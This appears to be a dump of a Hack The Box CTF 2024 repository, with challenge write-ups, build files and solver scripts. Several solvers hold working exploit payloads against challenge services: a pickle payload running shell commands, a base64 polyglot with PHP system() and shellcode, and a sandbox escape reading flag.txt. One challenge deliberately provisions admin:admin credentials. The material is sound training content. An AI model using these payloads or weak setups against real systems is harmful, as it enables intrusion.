Urgent/assets/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] Urgent/assets/flag.png -------------------------------------------------------------------------------- /forensics/[Very Easy] Urgent/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] Urgent/assets/htb.png -------------------------------------------------------------------------------- /forensics/[Very Easy] Urgent/assets/html.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] Urgent/assets/html.png -------------------------------------------------------------------------------- /hw/BunnyPass [Very Easy]/README.md: -------------------------------------------------------------------------------- 1 | ![img](../../../../../assets/banner.png) 2 | 3 | BunnyPass 5 | 6 | 14$^{st}$ March 2024 / Document No. D24.102.24 7 | 8 | Prepared By: `diogt` 9 | 10 | Challenge Author(s): `makelaris` 11 | 12 | Difficulty: Very Easy 13 | 14 | Classification: Official 15 | 16 | # Synopsis 17 | 18 | - The objective of this challenge is to gain access to a RabbitMQ instance and read the messages sent over it 19 | 20 | ## Description 21 | 22 | - As you discovered in the PDF, the production factory of the game is revealed. This factory manufactures all the hardware devices and custom silicon chips (of common components) that The Fray uses to create sensors, drones, and various other items for the games. Upon arriving at the factory, you scan the networks and come across a RabbitMQ instance. 
It appears that default credentials will work. 23 | 24 | 25 | ## Skills Required 26 | 27 | - Basic understanding of web interfaces 28 | 29 | ## Skills Learned 30 | 31 | - Navigating a RabbitMQ instance and reading messages 32 | 33 | # Enumeration 34 | 35 | This challenge does not have a downloadable part; we are only given a live instance of RabbitMQ. As per the description of the challenge, the default credentials should be valid for this instance. Given this hint let us try the common `admin:admin` combination. 36 | 37 | ![loginpage](assets/loginpage.png) 38 | 39 | 40 | 41 | After pressing the Login button we successfully connect to the RabbitMQ instance. The login succeeds because the instance has an administrator account whose password is the same as its username; replacing such passwords and restricting who can reach the management interface closes this path. 42 | 43 | ![page_1](assets/page_1.png) 44 | 45 | If we search in Google for RabbitMQ we can see that it's a message broker that uses the Advanced Message Queuing Protocol (AMQP). 46 | 47 | rabbitmq 48 | 49 | Based on that information we can navigate to the Queues tab and see if we can read any of the messages. 50 | 51 | ![queues2](assets/queues2.png) 52 | 53 | Out of all the Queues, only one appears to have a substantial number of messages, factory_idle with 6 messages ready. Selecting that leads us to another page. 54 | 55 | ![get_msg_1](assets/get_msg_1.png) 56 | 57 | On the bottom of the page, we can see a `Get messages` drop-down menu. 58 | 59 | get_msg_2 60 | 61 | Let's input the number of messages we saw earlier, six, and hit the `Get Message(s)` button. Scrolling over the messages we can see that the last message contains the flag. 
62 | 63 | get_msg_3 64 | 65 | # Solution 66 | 67 | N/A 68 | 69 | -------------------------------------------------------------------------------- /hw/BunnyPass [Very Easy]/assets/get_msg_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/BunnyPass [Very Easy]/assets/get_msg_1.png -------------------------------------------------------------------------------- /hw/BunnyPass [Very Easy]/assets/get_msg_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/BunnyPass [Very Easy]/assets/get_msg_2.png -------------------------------------------------------------------------------- /hw/BunnyPass [Very Easy]/assets/get_msg_3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/BunnyPass [Very Easy]/assets/get_msg_3.png -------------------------------------------------------------------------------- /hw/BunnyPass [Very Easy]/assets/loginpage.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/BunnyPass [Very Easy]/assets/loginpage.png -------------------------------------------------------------------------------- /hw/BunnyPass [Very Easy]/assets/page_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/BunnyPass [Very Easy]/assets/page_1.png -------------------------------------------------------------------------------- /hw/BunnyPass [Very 
#!/bin/bash
# hw/BunnyPass [Very Easy]/entrypoint.sh
#
# Provisions the RabbitMQ instance used by the BunnyPass challenge: waits for
# the broker, creates the administrator account, declares the queues and
# publishes the sample messages (the flag is the last message on factory_idle).

# Secure entrypoint: owner-only access to this script, which embeds the flag
# in plain text further down.
chmod 600 /entrypoint.sh

# Wait for RabbitMQ to start: poll the management API aliveness test over
# loopback with the built-in guest account until it answers HTTP 200.
until [[ "$(curl -s -o /dev/null -w '%{http_code}' http://guest:guest@127.0.0.1:15672/api/aliveness-test/%2F)" == "200" ]]; do
    echo "RabbitMQ not up yet" && sleep 1
done

# Setup admin user.
# NOTE(review): admin/admin with the administrator tag and ".*" for the
# configure, write and read permissions on vhost "/" is the deliberately weak
# account this challenge is built around. Whoever guesses it can read every
# queued message through the management UI, so this is not a provisioning
# template for a real broker.
rabbitmqctl add_user admin admin
rabbitmqctl set_user_tags admin administrator
rabbitmqctl set_permissions -p / admin ".*" ".*" ".*"

# declare_queue NAME: declare one durable queue on the default vhost.
declare_queue() {
    rabbitmqadmin declare queue --vhost=/ name="$1" durable=true
}

# publish QUEUE BODY: send BODY through the default exchange, routed to QUEUE.
publish() {
    echo "$2" | rabbitmqadmin publish exchange=amq.default routing_key="$1"
}

# Declare message queues
for queue_name in factory_idle automation batch_process alerts quality_control; do
    declare_queue "$queue_name"
done

# Populate data (publish order is kept as-is; it fixes the order of messages
# inside each queue).
publish factory_idle 102
publish automation process_done
publish automation process_idle
publish automation process_halt
publish batch_process labelled
publish batch_process processed
publish batch_process pending
publish factory_idle 00
publish factory_idle "device-halted|err|storage_room_132"
publish factory_idle "device-failed-to-respond|err|storage_room_132"
publish factory_idle "device-time-out|err|storage_room_132"

# Add more queues and logs
for queue_name in production_logs temperature_logs maintenance_logs; do
    declare_queue "$queue_name"
done

publish production_logs "production_started|info|line_1"
publish quality_control "product_quality_issue|warning|line_1"
publish maintenance_logs "maintenance_required|info|line_1"

# The flag goes in last, so it is the final message on factory_idle.
publish factory_idle "HTB{th3_hunt3d_b3c0m3s_th3_hunt3r}"
/hw/Flash-ing Logs [Hard]/assets/datahsheet_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/datahsheet_2.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/datasheet_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/datasheet_1.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/datasheet_3_instructions.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/datasheet_3_instructions.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/datasheet_3_instructions_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/datasheet_3_instructions_2.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/flow_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/flow_1.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/instruction_erase_sector.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/instruction_erase_sector.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/instruction_page_program.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/instruction_page_program.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/instruction_read.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/instruction_read.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/instruction_read_sec_reg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/instruction_read_sec_reg.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/instruction_write_enable.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/instruction_write_enable.png -------------------------------------------------------------------------------- /hw/Flash-ing Logs [Hard]/assets/winbond.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Flash-ing Logs [Hard]/assets/winbond.png -------------------------------------------------------------------------------- /hw/Maze [Very Easy]/Makefile: -------------------------------------------------------------------------------- 1 | default: 2 | ifdef name 3 | @cd challenge; \ 4 | mkdir -p ../release/hardware_$(name); \ 5 | cp -r ./fs ../release/hardware_$(name); 6 | 7 | @cd release; \ 8 | zip -9 -r ./hardware_$(name).zip ./hardware_$(name); \ 9 | unzip -l ./hardware_$(name).zip; 10 | 11 | @echo [+] Challenge was built successfully. 12 | else 13 | @echo [-] Please define the challenge name. For example, \"make name=cool_chall_name\" 14 | endif 15 | 16 | test: clean default 17 | 18 | clean: 19 | @rm -rf release/* 20 | @echo [+] Challenge release deleted successfully. 21 | -------------------------------------------------------------------------------- /hw/Maze [Very Easy]/README.md: -------------------------------------------------------------------------------- 1 | ![img](../../../../../assets/banner.png) 2 | 3 | Maze 4 | 5 | 28th 2022 / Document No. D22.102.16 6 | 7 | Prepared By: WizardAlfredo 8 | 9 | Challenge Author(s): WizardAlfredo 10 | 11 | Difficulty: Very Easy 12 | 13 | Classification: Official 14 | 15 | # Synopsis 16 | 17 | - Read a PDF from a printer's filesystem 18 | 19 | ## Description 20 | 21 | - In a world divided by factions, "AM", a young hacker from the Phreaks, found himself falling in love with "echo," a talented security researcher from the Revivalists. Despite the different backgrounds, you share a common goal: dismantling The Fray. You still remember the first interaction where you both independently hacked into The Fray's systems and stumbled upon the same vulnerability in a printer. 
Leaving behind your hacker handles, "AM" and "echo," you connected through IRC channels and began plotting your rebellion together. Now, it's finally time to analyze the printer's filesystem. What can you find? 22 | 23 | ## Skills Required 24 | 25 | - Basic folder navigation. 26 | 27 | ## Skills Learned 28 | 29 | - Learn the file system structure of a printer. 30 | 31 | # Enumeration 32 | 33 | ## Analyzing the files 34 | 35 | In this challenge we only get a downloadable. If we do a simple `tree` command 36 | we will get the following folders and a file called Factory.pdf. 37 | 38 | ```bash 39 | fs 40 | ├── PJL 41 | ├── PostScript 42 | ├── saveDevice 43 | │   └── SavedJobs 44 | │   ├── InProgress 45 | │   │   └── Factory.pdf 46 | │   └── KeepJob 47 | └── webServer 48 | ├── default 49 | │   └── csconfig 50 | ├── home 51 | │   ├── device.html 52 | │   └── hostmanifest 53 | ├── lib 54 | │   ├── keys 55 | │   └── security 56 | ├── objects 57 | └── permanent 58 | ``` 59 | 60 | Let's delve into the file structure of a HP laserjet printer's filesystem. There are four main directories: `PJL`, `PostScript`, `saveDevice`, and `webServer`. 61 | 62 | - `PJL` and `PostScript`: These directories typically contain files related to Printer Job Language (PJL) and PostScript, respectively. PostScript is a page description language commonly used in printing and desktop publishing. 63 | 64 | - `webServer`: This folder holds files associated with the printer's web server functionality. 65 | 66 | - `saveDevice`: This directory is our primary focus, as it manages print jobs on the printer. Specifically: 67 | - `SavedJobs`: This subdirectory has two further subdirectories: 68 | - `InProgress`: Contains jobs currently being processed or printed. 69 | - `KeepJob`: Contains completed jobs retained for future reference. 70 | 71 | # Solution: 72 | 73 | ## Getting the Flag 74 | 75 | Upon inspection of the `InProgress` directory, we find a PDF named Factory.pdf. 
Let's open it and retrieve the flag. 76 | 77 | ![image-20240314210808496](./assets/image-20240314210808496.png) 78 | -------------------------------------------------------------------------------- /hw/Maze [Very Easy]/assets/image-20240314210808496.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Maze [Very Easy]/assets/image-20240314210808496.png -------------------------------------------------------------------------------- /hw/Rids [Easy]/assets/W25Q128.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Rids [Easy]/assets/W25Q128.png -------------------------------------------------------------------------------- /hw/Rids [Easy]/assets/datahsheet_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Rids [Easy]/assets/datahsheet_2.png -------------------------------------------------------------------------------- /hw/Rids [Easy]/assets/datasheet_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Rids [Easy]/assets/datasheet_1.png -------------------------------------------------------------------------------- /hw/Rids [Easy]/assets/instruction_read.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/Rids [Easy]/assets/instruction_read.png -------------------------------------------------------------------------------- /hw/Rids 
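# hw/Rids [Easy]/htb/solver.py
"""Solver for the Rids hardware challenge.

Sends a single SPI read command to the challenge service (which proxies a
flash chip through a pyftdi-style JSON interface) and prints the printable
part of the returned memory.
"""
import socket
import json
import binascii
import struct
import copy
from pwn import args

# Target selection: REMOTE=1 HOST=ip:port on the command line, else localhost.
if args.REMOTE:
    IP, PORT = args.HOST.split(":")
else:
    IP = '127.0.0.1'
    PORT = 1337


def exchange(hex_list, value=0):
    """Send one SPI transfer request and return the decoded JSON reply.

    Args:
        hex_list: iterable of ints to clock out to the device (instruction
            byte followed by any address/data bytes).
        value: number of bytes to read back after the write ("readlen").

    Returns:
        The parsed JSON response; the termination check below assumes it is
        a JSON list.

    Raises:
        ConnectionError: if the peer closes the connection before a complete
            reply was received.
    """
    # Configure according to your setup
    cs = 0  # /CS on A*BUS3 (range: A*BUS3 to A*BUS7)

    usb_device_url = 'ftdi://ftdi:2232h/1'

    # Convert hex list to strings and prepare the command data
    command_data = {
        "tool": "pyftdi",
        "cs_pin": cs,
        "url": usb_device_url,
        "data_out": [hex(x) for x in hex_list],  # ints -> "0x.." strings
        "readlen": value
    }

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((IP, int(PORT)))

        # Serialize data to JSON and send
        s.sendall(json.dumps(command_data).encode('utf-8'))

        # Receive until the closing bracket of the JSON list arrives.
        data = b''
        while not data.endswith(b']'):
            chunk = s.recv(1024)
            if not chunk:
                # recv() returns b'' once the peer has closed the socket;
                # without this check the loop would spin forever.
                raise ConnectionError(
                    "connection closed before a complete response was received")
            data += chunk

    return json.loads(data.decode('utf-8'))


def format_print(log_entry):
    """Print a sequence of byte values as upper-case, space-separated hex."""
    print(' '.join(f'{num:02x}' for num in log_entry).upper())


def append_crc(data):
    """Return ``data`` with its CRC32 appended.

    The checksum is packed with struct format 'I', i.e. as an unsigned int in
    the host's native byte order and size.
    """
    crc = binascii.crc32(data) & 0xffffffff
    return data + struct.pack('I', crc)


# 0x03 followed by three zero bytes: presumably the flash "Read Data"
# instruction with a 24-bit start address of 0 (confirm against the
# datasheet); 4096 bytes are requested back.
FLAG = exchange([0x03, 0x00, 0x00, 0x00], 4096)


# Turn the returned byte values into characters, dropping 0xFF bytes
# (presumably erased-flash filler).
ascii_values = [chr(char) for char in FLAG if char < 255]

print(''.join(ascii_values))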
https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/The PROM [Medium]/assets/image-20240313173144008.png -------------------------------------------------------------------------------- /hw/The PROM [Medium]/htb/solver.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | def byte_to_volts(byte): 5 | return [((byte >> i) & 1) * 5 for i in range(10, -1, -1)] 6 | 7 | 8 | def bits_to_byte(bits): 9 | return int(''.join(map(str, bits)), 2) 10 | 11 | 12 | def to_ascii(data): 13 | return data.decode().strip() 14 | 15 | 16 | def read_memory(address, secret=False): 17 | r.sendlineafter(b"> ", b"set_ce_pin(0)") 18 | r.sendlineafter(b"> ", b"set_oe_pin(0)") 19 | r.sendlineafter(b"> ", b"set_we_pin(5)") 20 | if secret: 21 | bits = byte_to_volts(address) 22 | bits[1] = 12 23 | address_pins = bytes(str(bits), "Latin") 24 | else: 25 | address_pins = bytes(str(byte_to_volts(address)), "Latin") 26 | r.sendlineafter(b"> ", b"set_address_pins(" + address_pins + b")") 27 | r.sendlineafter(b"> ", b"read_byte()") 28 | return to_ascii(r.recvline()) 29 | 30 | 31 | def get_flag(): 32 | flag = "" 33 | for address in range(0x7e0, 0x7ff + 1): 34 | data = read_memory(address, secret=True) 35 | byte = data[5:-17] 36 | flag += chr(eval(byte)) 37 | return flag 38 | 39 | 40 | def pwn(): 41 | r.recvuntil(b"> help") 42 | flag = get_flag() 43 | print(flag) 44 | 45 | 46 | if __name__ == "__main__": 47 | if args.REMOTE: 48 | ip, port = args.HOST.split(":") 49 | r = remote(ip, int(port)) 50 | else: 51 | r = process("python3 ../challenge/server.py", shell=True) 52 | 53 | pwn() 54 | -------------------------------------------------------------------------------- /misc/[Easy] Cubicle Riddle/htb/solver.py: -------------------------------------------------------------------------------- 1 | import telnetlib 2 | import re 3 | 4 | _payload = 
b'|\x00D\x00]\x12}\x03|\x03|\x01k\x00\x00\x00\x00\x00r\x02|\x03}\x01|\x03|\x02k\x04\x00\x00\x00\x00r\x02|\x03}\x02\x8c\x13' 5 | _payload_string = ','.join(str(b) for b in _payload) 6 | HOST = "127.0.0.1" 7 | PORT = 1337 8 | 9 | tn = telnetlib.Telnet(HOST, PORT) 10 | 11 | print(" > Connected succesfully to server...") 12 | tn.read_until(b"\n(Choose wisely) > ") 13 | print(" > Read garbage...") 14 | tn.write(b'1') 15 | tn.read_until(b"\n(Answer wisely) > ") 16 | print(" > Read some more garbage...") 17 | tn.write(_payload_string.encode()) 18 | last_message = str(tn.read_all()) 19 | 20 | 21 | pattern = re.compile("HTB\{.*?\}") 22 | match = re.search(pattern, last_message) 23 | print(f" > Found the flag: {match.group()}") -------------------------------------------------------------------------------- /misc/[Easy] Unbreakable/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/misc/[Easy] Unbreakable/assets/banner.png -------------------------------------------------------------------------------- /misc/[Easy] Unbreakable/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/misc/[Easy] Unbreakable/assets/htb.png -------------------------------------------------------------------------------- /misc/[Easy] Unbreakable/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | import warnings 4 | import os 5 | warnings.filterwarnings('ignore') 6 | context.log_level = 'critical' 7 | 8 | fname = './main.py' 9 | 10 | LOCAL = False 11 | 12 | os.system('clear') 13 | 14 | if LOCAL: 15 | print('Running solver locally..\n') 16 | r = process(['python3', fname]) 17 | else: 18 | IP = 
str(sys.argv[1]) if len(sys.argv) >= 2 else '0.0.0.0' 19 | PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else 1337 20 | r = remote(IP, PORT) 21 | print(f'Running solver remotely at {IP} {PORT}\n') 22 | 23 | r.sendline("print(open('flag.txt','r').read())#") 24 | print(f'Flag --> {r.recvline_contains(b"HTB").strip().decode()[2:]}\n') 25 | -------------------------------------------------------------------------------- /misc/[Easy] Were Pickle Phreaks/htb/sol.py: -------------------------------------------------------------------------------- 1 | from base64 import b64encode 2 | from pickora import Compiler 3 | from pwn import * 4 | 5 | def send_payload(payload): 6 | payload = b64encode(compiler.compile(payload)) 7 | io.recvuntil(b'> ') 8 | io.sendline(b'2') 9 | io.recvuntil(b': ') 10 | io.sendline(payload) 11 | 12 | def get_flag(): 13 | io.recvuntil(b'> ') 14 | io.sendline(b'1') 15 | io.recvuntil(b'HTB{') 16 | flag = io.recvuntil(b'}') 17 | return b'HTB{' + flag 18 | 19 | def pwn(): 20 | send_payload(b"GLOBAL('app', 'random._os.system')('cat flag.txt')") 21 | flag = get_flag() 22 | print(flag) 23 | 24 | if __name__ == '__main__': 25 | ip = '127.0.0.1' 26 | port = 1337 27 | io = remote(ip, port) 28 | #io = process(['python', 'app.py']) 29 | compiler = Compiler() 30 | pwn() 31 | -------------------------------------------------------------------------------- /misc/[Hard] MultiDigilingual/htb/sol.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | def send_payload(): 4 | io.recvuntil(b': ') 5 | io.sendline(payload) 6 | 7 | def get_flag(): 8 | io.recvuntil(b'HTB{') 9 | flag = io.recvuntil(b'}') 10 | return b'HTB{' + flag 11 | 12 | def pwn(): 13 | send_payload() 14 | flag = get_flag() 15 | print(flag) 16 | 17 | if __name__ == '__main__': 18 | ip = '127.0.0.1' 19 | port = 1337 20 | io = remote(ip, port) 21 | #io = process(['python', 'server.py']) 22 | payload = 
b'I2lmIDAKIzw/cGhwIHN5c3RlbSgnY2F0IGZsYWcudHh0OycpOyBfX2hhbHRfY29tcGlsZXIoKTs/PgpwcmludCgoKCJiIiArICIwIiA9PSAwIGFuZCBleGVjKCJjYXQgZmxhZy50eHQiKSkgb3IgKDAgYW5kIGV4ZWMoImNhdCBmbGFnLnR4dCIpIG9yIGV2YWwoJ19faW1wb3J0X18oInN5cyIpLnN0ZG91dC53cml0ZShvcGVuKCJmbGFnLnR4dCIpLnJlYWQoKSknKSkpKTsKI2VuZGlmCl9fYXNtX18oIi5zZWN0aW9uIC50ZXh0XG4uZ2xvYmwgbWFpblxubWFpbjpcbm1vdiAkMHgwMDAwMDAwMDAwMDAwMDAwLCAlcmF4XG5wdXNoICVyYXhcbm1vdiAkMHg3NDc4NzQyZTY3NjE2YzY2LCAlcmF4XG5wdXNoICVyYXhcbm1vdiAlcnNwLCAlcmRpXG54b3IgJXJzaSwgJXJzaVxubW92ICQyLCAlcmF4XG5zeXNjYWxsXG5tb3YgJXJheCwgJXJkaVxubW92ICVyc3AsICVyc2lcbm1vdiAkMHgxMDAsICVyZHhcbnhvciAlcmF4LCAlcmF4XG5zeXNjYWxsXG5tb3YgJDEsICVyZGlcbm1vdiAlcnNwLCAlcnNpXG5tb3YgJXJheCwgJXJkeFxubW92ICQxLCAlcmF4XG5zeXNjYWxsXG54b3IgJXJkaSwgJXJkaVxubW92ICQ2MCwgJXJheFxuc3lzY2FsbFxuIik7' 23 | pwn() 24 | 25 | ''' 26 | exploit code 27 | 28 | #if 0 29 | # 30 | print((("b" + "0" == 0 and exec("cat flag.txt")) or (0 and exec("cat flag.txt") or eval('__import__("sys").stdout.write(open("flag.txt").read())')))); 31 | #endif 32 | __asm__(".section .text\n.globl main\nmain:\nmov $0x0000000000000000, %rax\npush %rax\nmov $0x7478742e67616c66, %rax\npush %rax\nmov %rsp, %rdi\nxor %rsi, %rsi\nmov $2, %rax\nsyscall\nmov %rax, %rdi\nmov %rsp, %rsi\nmov $0x100, %rdx\nxor %rax, %rax\nsyscall\nmov $1, %rdi\nmov %rsp, %rsi\nmov %rax, %rdx\nmov $1, %rax\nsyscall\nxor %rdi, %rdi\nmov $60, %rax\nsyscall\n"); 33 | ''' 34 | -------------------------------------------------------------------------------- /misc/[Hard] Path of Survival/assets/initial_view.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/misc/[Hard] Path of Survival/assets/initial_view.png -------------------------------------------------------------------------------- /misc/[Hard] Path of Survival/htb/consts_sol.py: 
-------------------------------------------------------------------------------- 1 | # Enum Class for Terrain Type 2 | class Terrain: 3 | PLAINS = 'P' 4 | MOUNTAIN = 'M' 5 | RIVER = 'R' 6 | SAND = 'S' 7 | CLIFF = 'C' 8 | GEYSER = 'G' 9 | EMPTY = 'E' 10 | 11 | 12 | class Direction: 13 | LEFT = 'L' 14 | RIGHT = 'R' 15 | UP = 'U' 16 | DOWN = 'D' 17 | 18 | 19 | # moving to/from a cliff or geyser is only 1 point regardless 20 | # moving to and from same terrain type is 1 point 21 | # rest are detailed here 22 | COSTS = { 23 | (Terrain.PLAINS, Terrain.MOUNTAIN): 5, 24 | (Terrain.MOUNTAIN, Terrain.PLAINS): 2, 25 | 26 | (Terrain.PLAINS, Terrain.SAND): 2, 27 | (Terrain.SAND, Terrain.PLAINS): 2, 28 | 29 | (Terrain.PLAINS, Terrain.RIVER): 5, 30 | (Terrain.RIVER, Terrain.PLAINS): 5, 31 | 32 | (Terrain.MOUNTAIN, Terrain.SAND): 5, 33 | (Terrain.SAND, Terrain.MOUNTAIN): 7, 34 | 35 | (Terrain.MOUNTAIN, Terrain.RIVER): 8, 36 | (Terrain.RIVER, Terrain.MOUNTAIN): 10, 37 | 38 | (Terrain.SAND, Terrain.RIVER): 8, 39 | (Terrain.RIVER, Terrain.SAND): 6 40 | } 41 | -------------------------------------------------------------------------------- /misc/[Hard] Path of Survival/htb/pathfinder_sol.py: -------------------------------------------------------------------------------- 1 | from math import inf 2 | 3 | 4 | class Node: 5 | def __init__(self, name): 6 | self.name = name 7 | self.edges = dict() 8 | 9 | def add_edge(self, node, cost): 10 | self.edges[node] = cost 11 | 12 | def print_edges(self): 13 | print(self.edges) 14 | 15 | def __repr__(self): 16 | return str(self.name) 17 | 18 | 19 | class Graph: 20 | def __init__(self, nodes): 21 | self.nodes = nodes 22 | 23 | def dijkstra(self, start_node): 24 | distances = {start_node: 0} 25 | nodes_from = {start_node: start_node} 26 | 27 | for n in self.nodes: 28 | if n != start_node: 29 | distances[n] = inf 30 | 31 | explored = set() 32 | nodes_to_explore = [start_node] 33 | 34 | while len(nodes_to_explore) > 0: 35 | # find shortest node and 
remove 36 | shortest_node, shortest_distance = nodes_to_explore[0], distances[nodes_to_explore[0]] 37 | 38 | for node, cost in distances.items(): 39 | if node in explored: 40 | continue 41 | 42 | if cost < shortest_distance: 43 | shortest_node, shortest_distance = node, cost 44 | 45 | nodes_to_explore.remove(shortest_node) 46 | 47 | for node, cost in shortest_node.edges.items(): 48 | if node not in explored: 49 | nodes_to_explore.append(node) 50 | 51 | if distances[shortest_node] + cost < distances[node]: 52 | distances[node] = distances[shortest_node] + cost 53 | nodes_from[node] = shortest_node 54 | 55 | explored.add(shortest_node) 56 | 57 | return distances, nodes_from 58 | -------------------------------------------------------------------------------- /misc/[Hard] Path of Survival/htb/solve.py: -------------------------------------------------------------------------------- 1 | from game_sol import Map 2 | 3 | from requests import Session 4 | 5 | MAP = 'http://127.0.0.1:1337/map' 6 | UPDATE = 'http://127.0.0.1:1337/update' 7 | 8 | s = Session() 9 | 10 | while True: 11 | map_data = s.post(MAP).json() 12 | m = Map(width=map_data['width'], height=map_data['height'], tiles=map_data['tiles'], player=map_data['player']) 13 | 14 | seq = m.path_seq 15 | print(seq) 16 | 17 | for i, c in enumerate(seq): 18 | r = s.post(UPDATE, json={'direction': c}) 19 | data = r.json() 20 | 21 | if i == len(seq) - 1: 22 | assert 'solved' in data 23 | assert data['solved'] 24 | 25 | if 'flag' in data: 26 | print(data['flag']) 27 | exit(0) 28 | -------------------------------------------------------------------------------- /misc/[Medium] Colored Squares/Makefile: -------------------------------------------------------------------------------- 1 | default: 2 | ifdef name 3 | @cd challenge; \ 4 | python3 source.py; \ 5 | mkdir crypto_$(name); \ 6 | cp source.py output.txt ./crypto_$(name); \ 7 | cp output.txt ../htb/; \ 8 | mv ./crypto_$(name) ../release/; 9 | 10 | @cd release; \ 11 | zip 
